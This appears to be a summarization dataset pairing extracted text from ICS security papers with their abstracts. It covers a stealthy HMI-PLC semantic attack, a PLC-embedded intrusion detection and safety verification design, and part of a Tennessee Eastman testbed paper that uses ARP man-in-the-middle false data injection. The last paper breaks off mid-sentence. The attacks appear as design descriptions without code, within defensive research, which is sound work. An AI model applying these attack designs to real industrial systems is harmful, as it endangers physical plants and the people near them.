that the enhanced semantic attack can signi cantly improve the attack success rate. In future research, we will try to investigate the pro- posed attack on some real-world and large-scale ICS testbeds and seek for effective countermeasures against this kind of attacks, e.g., securing the communication channel via crypto- graphic means, e.g., by adding data integrity protections such as digital signatures or message authentications to prevent the attacker from modifying packets.
Summary:
Industrial Control Systems (ICS) play a very important role in national critical infrastructures. However, the growing interaction between the modern ICS and the Internet has made ICS more vulnerable to cyber attacks. In order to protect ICS from malicious attacks, intrusion detection technology emerges. By analyzing the network meta data or the industrial process data, Intrusion Detection Systems (IDS) can identify attacks that violate communication protocols or system speci cations. However, the existing intrusion detection technology is not omnipotent, which opens up a back door for some more advanced attacks. In this work, we design an enhanced multi-stage semantic attack against ICS, which is undetectable by existing IDS. By hijacking the communication channels between the Human Machine Interface (HMI) and the remote Programmable Logic Controllers (PLCs), the attacker can manipulate the measurement data and control instructions simultaneously. The fake measurement data deceives the human operator into making wrong decisions. Furthermore, the attacker can strategically manipulate the semantic meaning of control instructions according to system state transition rules. In the meanwhile, a fake view of measurement data is presented to the HMI to conceal the on-going malicious attack. This attack is totally stealthy since the message sizes and timing, the command sequences, and the system state values are all legitimate. Consequently, this attack can secretly bring the system into critical states. Experimental results have veri ed the strong attack ability of the proposed attack.
|
Summarize:
I. I NTRODUCTION The security of Programmable Logic Controllers (PLCs) is increasingly becoming a vital issue in securing industrial con- trol systems (ICS). There is an inherent dif culty integrating security into these PLCs as they are intended to be simple computing machines whose programs can be easily veri ed with the underlying physical systems they are controlling. Adding advanced security tools can compromise the time- sensitive operations as well as any general temporal attributes of the cyber-physical system. The security of PLCs continues to receive an increased amount of attention in the wake of ICS-targeted malware. ICS-CERT reports that in FY 2015 [1], they responded to 295 reported incidents involving critical infrastructure in the United States. Most programming and operator commands are sent using insecure proprietary network protocols. Not onlyhave proprietary protocols been reverse engineered, but open- source API s [2] have been released that allow programmers to develop invasive tools that can be used with malicious intent, such as PLCInject [3]. Additionally, open source packet dissectors have been developed for network protocol analyzers. The reverse engineering of certain proprietary protocols has resulted in new protocols being developed with encrypted communication. Although these protocols can provide secure communication for the latest products, they are typically only supported by later devices while the legacy devices remain vulnerable to packet injection attacks. Of ine security solutions such as TSV [4] and [5] have been proposed as bump-in-the-wire veri cation mechanisms sitting between the operator/programmer interface and the PLC. These solutions have provided the ability to verify the programs downloaded to the PLC against temporal safety properties. Furthermore, models have been proposed for of ine analysis of periodic traf c to and from a PLC [6]. These solutions were typically provided as external solutions, where more advanced processing systems are coupled with the PLC system to verify the programming inputs of the PLC. This allows for the advanced operations that require an abundance of memory such as the calculation of advanced physical properties of a system or processing the network traf c. Modular embedded controllers introduced the concept of coupling a PLC with an embedded hypervisor. The hypervi- sors are typically much more advanced embedded operating systems than the actual PLC. APIs are provided for developing programs that can be directly integrated into the programming blocks of the PLC either synchronously or asynchronously through shared memory between the PLC and the hypervisor. Development environments are provided to generate program- ming blocks that can call an associated library function on the hypervisor, e.g., a DLL le on a Windows hypervisor, allowing the PLC to pass inputs and take in outputs from the library function within the main PLC scan cycle [7]. In this paper, we leverage these coupled environments to978-1-5090-2002-7/16/$31.00 2016 IEEE 67 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. implement online security solutions directly integrated into the PLC. We rst provide a novel approach to implementing a cyber-physical veri cation solution directly integrated into the scan-cycle of the PLC using the embedded hypervisor to perform advanced calculations of the underlying physical system. We then present an online monitoring solution that provides an IDS based on aforementioned security models of periodic PLC traf c. Before providing further details of our solutions, it is im- portant to note that Industrial Control Systems should always be secured using a holistic approach as outlined in security standards such as IEC 62443. The layered security architecture derived from IEC 62443 can be summarized by considering Plant Security, Network Security, and System Integrity as shown in Figure 1. Fig. 1. The Concept of Defense-in-Depth Security solutions as applied in an industrial context must take into account these layers of protection. For example, the solutions described in this paper are part of the System Integrity layer which supports Detection of attacks . This paper is organized as follows. First, we provide a high-level overview of how our security solutions will be integrated into PLCs as well as our threat model in Section II. Then we present a model for a cyber-physical veri cation solution that leverages the shared memory between the PLC and the embedded hypervisor in Section III. Next, we present a model for a passive intrusion detection solution within the embedded hypervisor that provides online modeling of the network traf c within the PLC in Section IV. We then show how we implemented and evaluated our security solutions in Section V. Finally, we present related work in Section VI and conclude in Section VII. II. O VERVIEW The two security solutions presented in this paper leverage the coupling of embedded hypervisors and PLCs. Figure 2 shows an overview of how both models would be integrated into the PLC. For our cyber-physical veri cation solution, programming blocks are generated and directly integrated synchronously or asynchronously into the main scan cycle of Physical System PLC Shared Mem Control System Network Protocol Analysis Safety Verification Embedded Hypervisor Control Logic Fig. 2. System Overview. The coupled system communicates with the control system network. The PLC runs the control logic program that interfaces with the underlying physical system. The embedded hypervisor shares memory with the PLC and can run models with advanced calculations for protocol analysis and safety veri cation. the PLC that shares memory with a library on the embedded hypervisor. The threat model for this solution assumes that memory protection mechanisms are in place that can limit PLC clients to write to designated areas of memory. As we will detail in section III, these designated areas are treated as temporary buffers before the data along with the system state is veri ed within the embedded hypervisor and then forwarded to a destination buffer. Therefore, this model assumes that an attacker cannot circumvent this mechanism by directly writing to the destination buffer. If the proprietary protocol in question has been reverse-engineered, then the attacker might have the ability to remotely program the PLC and dictate the control ow of the program. The second IDS solution allows online intrusion detection from within the PLC. The threat model assumes that the hypervisor is inaccessible, i.e., cannot be tampered with, and that the hypervisor shares the same Ethernet channel as the PLC. This allows the embedded hypervisor to directly monitor all traf c coming into the PLC Ethernet port and to model the PLC from within the embedded hypervisor. Additionally, in both cases, the threat model assumes that a secure reporting mechanism is in place. Although the solutions provide detection mechanisms and active veri cation solutions, they do not emphasize secure reporting mechanisms to the operators and/or programmers. Actionable items upon intrusion are outside of the scope of this paper. III. C YBER -PHYSICAL VERIFICATION WITHIN A PLC SCAN CYCLE Previous bump-in-the-wire veri cation solutions have been implemented in order to symbolically verify the logical pro- grams downloaded to a PLC against temporal safety prop- erties. However, these solutions rely heavily on the sound-68 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. PLC Temporary Buffer Operator/Programmer Destination Buffer Embedded Hypervisor Verification Library 1 2 3 Fig. 3. CPS Veri cation: (1) PG/Client/HMI writes to temporary buffer; (2) A function in the veri cation library is called to verify this value; (3) If value doesn t violate safety constraints, the value in the temporary buffer is transferred to the destination buffer ness and completeness of their external, of ine veri cation solutions. There is an inherent dif culty in de ning and verifying cyber-physical safety properties given the variety of inputs in a typical PLC program and the complexity of the underlying physical invariant properties. Similarly, IDS models are passive external security solutions. Previously proposed models seem to have only been implemented for of ine traf c analysis. In both cases, there is no active veri cation of values written to memory in the PLC. PLCs support memory pro- tection and access control, but several programs still provide PLC clients with the capability of modifying the variables that represent discrete attributes of the cyber-physical solution. Using PLCs coupled with embedded hypervisors, active cyber-physical veri cation solutions of values written to mem- ory can be implemented and directly integrated into the scan cycle of a PLC. Our solution leverages this coupling to verify values written to areas of memory in the PLC. A high-level overview and control ow of a sample solution is presented in Figure 3. The solution works by restricting writes to the memory in the PLC to designated temporary buffers in memory. When a write to the temporary buffer is detected, the functional programming block associated with the embedded hypervisor library function is invoked and passes the system state to the embedded hypervisor. The written value is veri ed against previously de ned temporal safety properties based on the underlying physical model and the current system state. If the value written to the temporary buffer doesn t violate any safety or security constraints, the embedded hypervisor will return a signal to the PLC that allows this value to be forwarded to the destination memory buffer. Otherwise, the transfer will be blocked and a noti cation can be raised to the operator that an unsafe command has been issued. PLC Embedded Hypervisor R Q Deterministic Finite Automata Control System Network O1 O2 I1 I2 I3 I4 Control Logic Scan Cycle Fig. 4. Passive IDS implementation within the embedded hypervisor. The PLC and the hypervisor listen on the same port. The hypervisor maintains a model of the traf c for anomaly detection, such as the expected queries ( Q) and responses ( R) in an ethernet protocol, in parallel to the PLC running the control logic program. The purpose of interacting with the embedded hypervisor is to provide the ability of advanced calculations of the underlying physical system model. For example, if a PLC is controlling signi cant components of an electric power grid, e.g., circuit breakers and tap changers of transformers, the embedded hypervisor can take care of running optimal power ow equations to determine the impact of a particular action in real time, e.g., opening/closing a circuit breaker. IV. A UTOMATON -BASED CONTROLLER ANOMALY DETECTION The embedded hypervisors can also be used to implement online IDS from within the PLC. IDS solutions have been proposed for modeling PLC traf c for the purpose of detecting malicious packets. Our solution is based on the deterministic nite automaton (DFA) solution presented in [8] and [6]. Figure 4 presents a simple DFA example of Modbus traf c. In this system, an expected periodic traf c pattern is a sequence of four packets: a rst query ( Q1), a response to the rst query ( R1), a second query ( Q2), and a response to the second query ( R2). If a subsequent packet represents the next expected state in the pattern, then we have a Normal transition from one DFA state to the next. If the subsequent packet is the same as the current packet, then we have a Retransmission and the DFA remains in the same state. If the subsequent packet is not the expected packet and is within the subset of fQ1,R1, Q2,R2g, then we have a Miss and the DFA state transitions to the state of the subsequent packet. If the subsequent packet is not the expected packet and is not within this subset, then we have an Unknown and the DFA transitions to the beginning of the pattern sequence. An Unknown transition is the worst type of transition and can generally be expected to be an intrusion. Further details of the DFA algorithm as well as its application to speci c PLC Ethernet protocols can be found in the aforementioned papers.69 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. CPU 1515 Embedded Win7 WinAC ODK DLL WinAC ODK FB1 WinAC ODK FB1 WinAC ODK FB1 OB1 HMI2PLC DB Trigger 1 Trigger 2 Trigger 3 Laser Cutting System (HMI Panel) Malicious Client Fig. 5. CPS Veri cation Solution. WinAC ODK implementation allows the main scan cycle programming block, OB1, to invoke the automatically generated functional programming blocks, FB, associated with the veri cation library functions of the DLL located in the embedded hypervisor. The data block, HMI2PLC DB, can be written to by the legitimate HMI panel of our cyber-physical system or by a malicious client on the network. V. E VALUATIONS In this section, we present our evaluations and implemen- tations of the two proposed security solutions. Both of our solutions were implemented using the SIMATIC ET 200SP Open Controller, CPU 1515 PC. The PLC has a hypervisor with Windows Embedded 7E 32-Bit. We used SIMATIC WinAC Open Development Kit (ODK) to implement both of our solutions. The WinAC ODK provides an API for Microsoft Visual Studio that allows developers to generate DLLs with desired library functions to be stored on the embedded hypervisor, while also generating the associated programming blocks that are directly downloaded to the PLC and can interface with the DLL through shared memory. A. Cyber-physical Veri cation Solution The previous simple scenario was directly integrated into a cyber-physical simulation program. Figure 5 provides an overview of the cyber-physical system used in our solution. The associated physical system in this scenario is a laser- cutting tool that places materials onto a cutting platform and cuts a particular shape speci ed by the operator. Typically the HMI reads from and writes to a speci c DB, which we labeled HMI2PLC . We developed an attack scenario in which a hacker uses a Snap7 client to inject malicious packets that alter this DB. We integrated the WinAC ODK functions directly into the main cyclic programming block, OB1. Table I provides the safety speci cations of our sample security solution. The rst safety speci cation states that the system should not receive a manual direction signal moving the cutter up,down, left, or right while the system is in Auto mode, mean- ing that the cutting should be automatic. When OB1 detects a direction signal, a call to the associated WinAC ODK function is triggered. The WinAC ODK function will then check the relevant status bits and, if there is a violation of the safety speci cation, it will raise an alarm (e.g., a noti cation will be raised on the HMI panel). The second safety speci cation states that the laser-cutter s homing position (i.e., the position the cutter returns to when it has nished a full cutting-cycle) cannot change while the system is not in Auto mode and the system is not in Idle mode, which is just the mode that indicates the cutter is standing idle. If OB1 detects that either the X- or Y-coordinate of the homing position setting has changed, it will invoke the associated WinAC ODK function in the same manner to verify the change against these safety rules. If the WinAC ODK function detects a violation, it will raise a signal that forces the system to nish the current cutting cycle and stop production until the operator acknowledges the intrusion. The nal speci cation just states that the cutting speed of the laser cannot change while in Auto mode and while the Cutting indicator is true. If OB1 detects a change in the cutting speed, it will invoke another WinAC ODK function that issues and Emergency Stop signal if the rule was violated. Although these rules could have been easily implemented using simple ladder logic or STL programming, they serve as place holders for advanced calculations for physical equations. Our goal was to demonstrate a highly-coupled PLC veri - cation solution. Furthermore, these solutions can be directly integrated into the scan cycle timing and allow develop- ers to account for the veri cation solution in their timing speci cations. The associated programming blocks can be invoked synchronously or asynchronously depending on the safety/operational requirements of the scan cycle. This IDS relies on the assumption that the proprietary protocol is not reverse-engineered. If the PLC s programming protocol(s) are reverse engineered, a hacker who is able to establish a programming connection to the PLC can just program any blocks to overwrite or skip over the security implementation. B. Online Automaton-based Anomaly Detection Solution Our IDS solution implements an online analysis using T- Shark [9] to inspect every packet from within the embedded hypervisor. Using our knowledge of the S7-comm protocol from David Nardella s analysis, we built our solution on top of an already existing S7-comm Wireshark dissector plugin. We directly integrated the DFA IDS into the packet-dissection so that every packet over S7-comm protocol is processed through our model.70 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. TABLE I SAFETY SPECIFICATIONS FOR LASER -CUTTING SYSTEM Trigger Signal Safety Conditions Violation Response Manual Direction Click( ",#, ,!) !(Auto) Noti cation Home Position Changed !(Auto) && !(Idle) Stop Production Cutting Speed Changed !(Auto) && !(Cutting) Emergency Stop Incoming Packet: 1 Training Phase 2 Enforcement Phase Model Generation Q1 R1 Q2 Q2 Pattern Buffer: New Packet: Fig. 6. Deep packet inspection from within PLC. The solution rst trains the model by queueing the headers of the rst 1500 incoming packets and generating a DFA based on the training set, usually as a sequence os queries, Q, and responses, R. This DFA will then be used to enforce intrusion detection within the hypervisor Figure 6 shows an overview of our IDS implementation. T-Shark will listen on port 102, i.e., the shared PLC Ethernet port, for incoming packets and our plugin will dissect any packets that utilize the S7-comm protocol. As in [6], we have a learning stage (where the periodic pattern is learned) and an enforcement stage (where each packet is checked against the learned pattern). The symbols of our DFA are based solely on the headers of the S7-comm PDU. We split any multi- reads or multi-writes into individiual symbols. For example, if one packet speci es a write to 18 variables, we will split that packet into 18 separate symbols with the same pre x. Initially, we set our max pattern length to be 1500 symbols, with a validation window size of 6000 (these numbers taken from the latter aforementioned paper). Therefore, our plugin will queue the rst 6000 packets which are assumed to be benign. Starting at a pattern length of 2 and increasing up to 1500, we check to see which pattern length best ts the periodic data. A pattern s performance is essentially determined by the number of Normals over the total number of transitions ( Normals + Misses+Retransmissions +Unknowns ). Once we select an appropriate pattern, we can then set this pattern as our DFA. Each subsequent symbol is checked against this DFA and any Misses, Retransmissions, or Un- knowns will be reported accordingly. In our solution, we had the program write a portion of memory that would signal an alarm whenever an Unknown symbol was detected. Furthermore, we had to modify our validation window size and max pattern length as the simulation program generated much more symbols than 1500 in one cycle. We reinforced the IDS solution by ensuring that Retrans- mission packets were valid. Because the DFA solution discardsthe actual data values being written to variables, an attacker could generate a packet that has the same symbols as a previous packet and manipulate the data. Because the pattern is periodic, the attacker can then nd a way to inject the packet so that it lands in the sequence just before or after the same packet in the pattern. The DFA solution would simply identify this packet along with the extra acknowledgement packet as Retransmission symbols (since there will most likely be two acknowledgement packets in a row). To resolve this issue, we simply keep a data buffer that holds the data of the previous packet. If the current packet is identi ed as a Retransmission, we just compare the two data buffers and make sure nothing has been changed. Although this does not mitigate the case for Misses (as the data would not be expected to be the same), we can guarantee that valid Retransmissions are benign. In addition to not being able to validate Miss packets, there are a couple of limitations with this IDS solution. First, it relies on the data being highly periodic. For fully automated systems where there is little to no human interaction, our IDS solution would have an extremely high intrusion-detection accuracy. However, most industrial control systems involve operators who use HMI panels to send commands to the PLCs. The simulation program was designed to simulate an operator that starts the cutting process between 1 and 10 seconds every cycle. This operation will generate one symbol, i.e., the packet the operator sends to start the cutting process. This symbol will almost always be identi ed as a Miss since the operator starts the process at a different point in the pattern sequence every time. This false positive could most likely be mitigated by adapting the learning process to the application-speci c pattern. There are many ways to modify the algorithm by incorporating supervised learning. As a stand- alone, unsupervised process, though, our algorithm can only guarantee that Normal, Retransmission, and Unknown packets will be properly identi ed and handled accordingly. However, the goal of this solution was to present a sample IDS solution that can be embedded within the PLC. Having an advanced embedded hypervisor coupled with the PLC allows the system to provide online deep-packet inspection. VI. R ELATED WORK In this section, we will present several related veri cation and security solutions for PLCs. It is worth noting that our71 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. solutions emphasize the ability to verify and secure the PLC from within the device, not the security models themselves. We rst review works related to the guidelines associated with securing control systems. In [10], NIST guideline security architectures are presented for ICS with respect to supervisory control and data acquisition systems, distributed control sys- tems, and PLCs. Similar guidelines for the energy industry are presented in [11] and [12]. [13] and [14] argue that compliance with these standards provide a false sense of security. We now discuss previous security and veri cation solutions presented for control systems. TSV [4] presented an external bump-in-the-wire veri er for process controller code down- loaded to the PLC. Mohan et al. [15] introduced a monitor that dynamically checks the safety of plant behavior. Of ine intrusion detection solutions have been proposed to model PLC traf c as a deterministic nite automaton in [8] and [6]. Another model based intrusion detection was proposed in [16]. In all cases, the security solutions were implemented as external solutions as opposed to within the PLC. Avatar [17] provides a framework to support dynamic security analysis of embedded systems rmware. However, the rmware resides below the control logic level and security/veri cation solutions cannot be easily integrated into the scan-cycle of the PLC. In general, our solution focuses more on application-level security solutions. [18] uses mathematical analysis techniques to evaluate various aspects, such as safety and reliability, of a given control system, but focuses on accidental failures and not malicious actions. PLC vendors themselves typically use basic security mechanisms with a single privilege level [4]. VII. C ONCLUSIONS In this paper we presented two security models for PLCs that leverage the advanced computational power of embedded hypervisors that are coupled with PLCs. We evaluated im- plementations of both models on a real PLC on a simulated cyber-physical system with unpredictable operation. ACKNOWLEDGEMENT The authors would like to express their gratitude to George Trummer, Stefan Woronka, Ben Collar and Frank Garrabrant for their insightful feedbacks and constructive suggestions. This material is based upon work supported by Siemens as well as the Department of Energy under Award Number DE- OE0000780.
Summary:
With an increased emphasis on the cyber-physical security of safety-critical industrial control systems, pro- grammable logic controllers have been targeted by both secu- rity researchers and attackers as critical assets. Security and veri cation solutions have been proposed and/or implemented either externally or with limited computational power. Online veri cation or intrusion detection solutions are typically dif cult to implement within the control logic of the programmable logic controller due to the strict timing requirements and limited resources. Recently, there has been an increased advancement in open controller systems where programmable logic controllers are coupled with embedded hypervisors running operating sys- tems with much more computational power. Development envi- ronments are provided that allow developers to directly integrate library function calls from the embedded hypervisor into the program scan cycle of the programmable logic controller. In this paper, we leverage these coupled environments to implement online cyber-physical veri cation solutions directly integrated into the program scan cycle as well as online intrusion detection systems within the embedded hypervisor. This novel approach allows advanced security and veri cation solutions to be directly enforced from within the programmable logic controller program scan cycle. We evaluate the proposed solutions on a commercial- off-the-shelf Siemens product.
|
Summarize:
INDEX TERMS Industrial control systems, cyber attack, attack detection algorithm, man-in-the-middle attack, hybrid testbed. I. INTRODUCTION Recent technological advances in control, computing, and communications have generated intense interest in develop- ment of new generation of highly interconnected and sen- sor rich systems that is known as critical Cyber-Physical Systems (CPS) infrastructure with application to variety of engineering domains such as process and automation systems, smart grid and smart cities, and healthcare sys- tems. These complex systems are becoming more distributed and computer networked that have necessitated the devel- opment of novel monitoring, diagnostics, and distributed control technologies. Supervisory Control And Data Acqui- sition (SCADA) systems, Wireless Sensor Networks (WSN), The associate editor coordinating the review of this manuscript and approving it for publication was Wentao Fan .and PLCs, are now established paradigms that are utilized in many critical CPS infrastructure. On the other hand, the envisaged complex CPS infrastruc- ture do more than ever require development of novel and proactive security technologies, as these systems are con- tinuously being targeted by cyber attacks and intrusions by intelligent malicious adversaries. The adversaries are capable of attacking core control systems that are employed in all key cyber-physical systems infrastructure. These scenarios do not exist and are not possible or similar to security challenges that are present in traditional IT systems. Therefore, there exists an urgent need to study the vulnerabilities, analyze the risks, and develop defensive and mitigation mechanisms for critical CPS infrastructure. Due to sensitivity and high importance of the safety critical systems in real life, any research activity that is directly applied to the physical infrastructure can lead to disruption, VOLUME 9, 2021This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see https://creativecommons.org/licenses/by/4.0/16239 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed unexpected damages or losses, and hence development of testbeds that mimic behavior of CPS in a small-scale fashion is highly essential for development of various cyber-security technologies. In this paper, a hybrid cyber-physical testbed for industrial control systems is developed and various types of real cyber attack scenarios are injected and imple- mented. Moreover, online real-time cyber attack detection algorithms are proposed to provide a comprehensive solu- tion to the cyber-security of cyber-physical industrial control systems (ICS). ICS testbeds generally consist of two main components, namely the physical process and the eld devices such as PLC, HMI, RTU, etc. Depending on implementation meth- ods, ICS testbeds are classi ed into three main categories as follows [1]: I) simulation testbed in which both components of the ICS are solely based on computer simulation [2], II) physical testbed where real physical parts are used in both components [3], and III) hybrid testbed in which a combination of simulation and physical testbed is considered where some components of the testbed such as the physical process is simulated and the rest are based on actual physical parts [4], [5]. In this paper, the hybrid testbed architecture is selected for development of the ICS testbed, where the Tennessee Eastman (TE) plant is simulated inside a PC and the remain- ing parts are implemented using actual industrial hardware. The TE plant is selected as the industrial process for our developed cyber-security testbed due to the following rea- sons. First, the TE model is a well-known chemical process that is used in control systems research and its dynamics are well-understood. Second, it should be properly controlled otherwise small disturbances will drive the system towards an unsafe and unstable operation. The inherent unstable open-loop property of the TE process presents a real-world scenario in which a cyber attack could correspond to a real risk to human safety, environmental safety, and economic viability. Third, the TE process is complex, coupled and highly nonlinear, and has many degrees of freedom by which to control and perturb the dynamics of the process. Finally, various simulations of the TE process have been developed with readily available reusable code design by Ricker [6]. Finally, from the anomaly detection perspectives, the cyber attack detection algorithms can be divided into ve main cate- gories, namely: linear, proximity-based, probabilistic, outlier ensembles, and neural networks approaches [7]. Therefore, in order to have a comprehensive comparison for cyber attack detection approaches that t the TE process, the following algorithms have been chosen from various categories such as: Principal Component Analysis (PCA), One-Class Sup- port Vector Machines (OCSVM), Local Outlier Factor (LOF) k-Nearest-Neighbors (kNN), and Isolation Forest (IF). Com- parative studies are conducted based on the cyber attack detection time and the confusion matrix performance metrics where subsequently, the OCSVM and kNN are demonstrated to yield promising performance for accomplishing the cyber attack detection objective.A. BACKGROUND Cyber attacks on TE processes are also investigated in the literature. In [8], an integrity attack is injected on the manipulated variable signals and the corresponding sen- sor measurements are observed by correlation-based clus- tering algorithm. Different studies have been conducted on nding the optimal time to launch the Denial of Service (DoS) attack on either the sensor or actuator sig- nals in the TE process [9][11]. Several cyber attack detec- tion methods such as model-based approaches [12], [13], clustering-based approaches [14], Gaussian mixture mod- els [15], and RNN-based approaches [16] are developed for detection of different cyber attacks on the TE process. How- ever, all of the above work are based on the simulated TE process and cyber attacks are mainly emulated inside the simulation le. Furthermore, several recent ICS testbeds for investigating cyber security are developed in the literature and Table 1 presents comparisons among these testbeds for diverse range of applications that are based on TYPE (simulation (S), physical (P), real ICS (R), and hybrid (H)), Process, Data Type (network data (NET) and process data (PR)), Detection Method, Attacks, Attack Type (emulation (E) and physi- cal (P)). As shown in this table, in [17][25] cyber-physical testbeds are developed for the physical water system and different case studies in terms of data type, communica- tion and attack injection/detection are presented. In [17], a model-based detection approach is developed to detect three different attacks by using network data. Also, a physics- based detection approach is presented in [18] in order to detect stealthy vulnerability by using the process data. In [19], an Intrusion Detection System (IDS) approach is devel- oped to detect four various attacks by using network data. In [20], different data-driven intrusion detection algorithms are developed using the network data from the Modbus com- munication protocol. In [21][25], water system testbeds are developed based on the Ethernet/IP as the communication protocol. A power system testbed is designed and implemented in [26][28]. A simulation testbed is used in [26] and in [27] a physical testbed is developed and different attack detection algorithms are developed by using both the network and the process data. In [29], [30], a simpli ed version of the Tennessee Eastman process is utilized as the physical plant in the testbed and model-based attack detection algorithms are proposed for the simulation-based testbeds without con- sidering any physical hardware in the simulator. B. CONTRIBUTIONS In this paper, a full version of the nonlinear chemical process of the Tennessee Eastman process is used as the physical process in the developed hybrid testbed. Moreover, based on the structure and features of PROFINET as the industrial eld bus that is used in the Siemens distributed I/O, the actual real-time false data injection cyber attack is implemented 16240 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed TABLE 1. Overview of the existing testbeds for cyber-security study. through the man-in-the-middle (MITM) architecture on the developed testbed. This is achieved by utilizing Address Resolution Protocol such that the cyber hacker acts as the MITM in the closed-loop system and modi es the sensor measurements sent to the PLC or the actuator commands that are sent to the distributed I/O. Furthermore, various real-time online cyber attack detection algorithms are developed and implemented on the testbed and their performance capabili- ties are compared and evaluated. Consequently, this is the rst work in the literature that completely simulates a full-version of the Tennessee Eastman Process using a hybrid testbed. In other words, this work provides a comprehensive solution for the cyber-security of ICS enabled with the following main contributionsV 1) A hybrid testbed is developed by using the simulated full-version of the Tennessee Eastman Process as a non- linear unstable process and the Siemens eld devices such as PLC and distributed I/O, whereas the previous work in [29], [30] only considered the simpli ed ver- sion of TE without having anyactual hardware in the testbed. 2) Real-time false data injection cyber attacks are imple- mented by compromising the PROFINET eld-bus protocol for the rst time in the literature, where as shown in Table 1, all of the previous works are basedon either the Modbus or the Ethernet communication protocols. 3) Several online cyber attack detection methodologies such as PCA, OCSVM, LOF, KNN, and IF are devel- oped and implemented for real-time detection of cyber attacks in the supervisory level of the testbed. In con- trast, in most of the previous work in the literature the detection algorithms are implemented off-line after collecting the data from the testbed. The remainder of this paper is organized as follows. In Section II, the developed hybrid ICS testbed is presented. Section III provides details on PROFINET eld bus protocol that is used in the testbed and in Section IV, the implemen- tation of false data injection cyber attack is described and introduced. Section Vpresents the proposed cyber attack detection methodologies and in Section VItheir per- formances are quantitatively demonstrated, validated, and veri ed subject to various cyber attack scenarios. Finally, in Section VII, conclusions and future work are provided. II. HYBRID ICS TESTBED The cyber-physical ICS includes three main components namely, a physical plant to be controlled, an embedded system for implementing the controller, and a communica- tion network for exchanging the information between the VOLUME 9, 2021 16241 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed controller and the plant. In the developed testbed, these components are all considered where the plant is simulated inside a PC, the controller is implemented on an actual hard- ware (PLCs) and nally the communication is established by using the industrial protocol namely, PROFINET. As shown in Fig. 1, the developed testbed is partitioned into four layers: (1) the Tennessee Eastman plant that is simulated by a PC, (2) the eld devices that are emulated by using DAQ and the Siemens distributed I/O, (3) the control layer implementation using the Siemens PLCs, and (4) the supervisory layer using additional Siemens PLC and web- server. Moreover, the mathematical model of the TE process is implemented and simulated in Matlab/Simulink environ- ment and the controllers are implemented by using the PLCs. The interface between the plant simulation and the PLCs is accomplished by using the DAQ boards and the distributed I/O modules. The DAQ boards generate voltages that are proportional to various plant variables and also acquire the input voltages as the actuator command signals from the controller. Hence, by using the DAQs, different sensors and actuators inside the plant are emulated in the testbed. The distributed I/O modules provide the interface between the plant sensors/actuators and the PLCs. Consequently, the DAQ boards and the distributed I/O modules emulate the layer 1 within the industrial automation hierarchy, namely the eld layer. FIGURE 1. The developed hybrid ICS testbed. A. TENNESSEE EASTMAN (TE) PROCESS SIMULATION The TE process is rst described by Down and Vogel in 1993 [6], [31] and is modeled through fty (50) nonlinear and coupled differential equations [32]. It consists of ve major operational units, namely: (1) chemical reactor, (2) product condenser, (3) recycle compressor, (4) vapor-liquid separator, and (5) product stripper. Two liquid products (G, H) are produced by using A,C,D, and Egaseous reactants with BandFas inert and byproduct, respectively. The chemical reactions are irreversible and can be presented as followsV A(g)CC(g)CD(g)!G(l);Product 1; A(g)CC(g)CE(g)!H(l);Product 2;A(g)CE(g)!F(l);Byproduct; 3D(g)!2F(l);Byproduct: The TE process is a nonlinear open-loop unstable process which reaches its shutdown constraints in less than 2 hours. Accordingly, a controller is required to maintain the system in the steady state and the process variables at desired values, and to enforce hard constraints on the process variables such as the reactor pressure, the reactor level, the reactor tempera- ture, among others [31], [33]. The TE process has 12 manipulated variables (XMVs), 41 measured variables (XMEAS), and 20 different process disturbances (IDVs) which can be chosen by the user [6]. The output measurements (XMEAS) of the plant are divided into 22 continuous-time and 19 discrete-time measure- ments. In the developed testbed in this work, only 9 inputs and 16 continuous-time outputs are used as speci ed in Tables 2and3, respectively. It should be noted that the time unit of the original TE process model was in hours which is not suitable for a real-time simulation. Thus, in order to make the process real-time, the model is modi ed accordingly by changing the state dynamics of the system and correspond- ingly the controller gains. TABLE 2. Manipulated variables used in the testbed. TABLE 3. Process measurements used in the testbed. B. FIELD DEVICE AND CONTROL LAYERS In the developed ICS testbed, the Siemens S7-1200 PLC CPU and the SIMATIC EP 200SP distributed I/O modules are 16242 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed used. For establishing the interface between the simulated process on the PC, and PLCs and distributed modules, MF644 and MF634 DAQ boards are used mainly due to a high number of analog inputs/outputs and their compatibility with MATLAB/Simulink. Each I/O module contains 4 analog inputs and 2 analog outputs and in order to connect all PLCs with all I/Os, the Siemens CSM 1277 switch modules are used. As shown in Fig. 1, DAQ boards convert sensor measure- ments from the TE process (implemented by a PC) to analog signals and feed them to the distributed I/O modules. At the same time, DAQ boards receive the actuator signals from the distributed I/Os and feed them back to the TE process that is simulated by Simulink. All communications between the distributed I/O modules and PLCs are based on the PROFINET protocol which is an Open Real-time Industrial Ethernet Standard Protocol which can be used for virtually any function that is required in automation, namely: discrete, process, motion, peer-to-peer integration, vertical integration, and safety, among others. As shown in Table 4, the closed-loop controller scheme for the testbed contains 9 main Proportional-Integral (PI) controllers on ve PLCs that are regulating the ow rate of each valve and the 8 internal PI loops for generating the internal set-points and variables that are needed in the main PI controllers. Accordingly, all the PI controllers' gains have been selected from the original paper in [31]. Subsequently, in order to convert the process to a real-time process in terms of process run time, all the Ti's gains are multiplied by 3600. The corresponding measurements and control inputs for each I/O module and the corresponding PLC are speci ed in Fig. 2. Moreover, as illustrated in this gure, XMEAS 17 and the production rate (FP as the internal variable in the PLC1) are also required by the other PLCs, which are implemented by using the Siemens S7 communication protocol. TABLE 4. Distribution of the TE control blocks in PLCs. C. SUPERVISORY LAYER As depicted in Fig 1, the supervisory layer that consists of the PLC 6 is the last layer of the TE testbed. Each Siemens S7-1200 contains internal 